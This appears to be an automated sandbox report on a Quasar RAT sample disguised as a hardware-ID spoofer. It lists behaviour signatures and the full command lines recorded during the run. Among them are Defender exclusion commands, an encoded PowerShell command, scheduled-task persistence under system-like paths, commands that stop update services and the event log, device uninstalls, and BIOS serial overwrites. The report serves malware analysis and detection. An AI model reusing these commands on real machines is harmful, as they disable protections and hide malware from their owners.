Analysis Overview
SHA256
18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc
Threat Level: Known bad
The file SPOOFER.bin.exe was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Nirsoft
Creates new service(s)
Stops running service(s)
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Maps connected drives based on registry
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Analysis: static1
Detonation Overview
Reported: 2023-12-28 18:55
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted: 2023-12-28 18:55
Reported: 2023-12-28 18:58
Platform: win7-20231215-en
Max time kernel: 1s
Max time network: 153s
Signatures
Quasar RAT
Quasar payload
Nirsoft
Creates new service(s)
Stops running service(s)
Executes dropped EXE
| Process |
| C:\Users\Admin\AppData\Local\Temp\svchost.exe |
| C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
Loads dropped DLL
| Process | Count |
| C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe | 2 |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Process |
| C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
Launches sc.exe
| Process | Count |
| C:\Windows\system32\sc.exe | 14 |
Enumerates physical storage devices
Creates scheduled task(s)
| Process | Count |
| C:\Windows\system32\schtasks.exe | 15 |
Suspicious use of SetWindowsHookEx
| Process |
| C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1PJI-4306
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 5 /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Volumeid64V" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qDwW3x7lSK.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\Sample Music\smss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /rl HIGHEST /f
C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe
"C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Volumeid64" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Volumeid64V" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Client" /sc ONLOGON /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1PJI-4306
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717864HP-TRGT27470MST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317864HP-TRGT27470DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617864HP-TRGT27470FU
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417864HP-TRGT27470FA
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517864HP-TRGT27470SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817864HP-TRGT27470SG
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217864HP-TRGT27470RV
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17864HP-TRGT27470AB
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517881HP-TRGT15676SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617881HP-TRGT15676FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717881HP-TRGT15676MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317881HP-TRGT15676DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417881HP-TRGT15676FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817881HP-TRGT15676SG
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517897HP-TRGT3882SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717897HP-TRGT3882MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317897HP-TRGT3882DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617897HP-TRGT3882FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417897HP-TRGT3882FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817897HP-TRGT3882SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217897HP-TRGT3882RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17897HP-TRGT3882AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217881HP-TRGT15676RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17881HP-TRGT15676AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: E599-KPK5
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: E599-KPK5
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z7F8-9TBH
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z7F8-9TBH
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UM6T-ZO0D
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UM6T-ZO0D
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BLKE-U3J4
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BLKE-U3J4
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EZAT-10UA
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EZAT-10UA
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: H2H9-L1OA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: H2H9-L1OA
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: N33L-K7M9
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: N33L-K7M9
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: E9LC-7ELM
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: E9LC-7ELM
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SIC4-96Z2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SIC4-96Z2
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CNET-RFTN
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CNET-RFTN
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: D6CT-S1IL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: D6CT-S1IL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 45B3-4O51
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 45B3-4O51
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4EMT-BP7S
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4EMT-BP7S
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: POVC-BDRB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: POVC-BDRB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TTCG-MGAK
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TTCG-MGAK
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: IGI2-Z8TL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: IGI2-Z8TL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: AO2F-JEN3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: AO2F-JEN3
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 1T7U-G5OM
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 1T7U-G5OM
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 731N-LSOS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 731N-LSOS
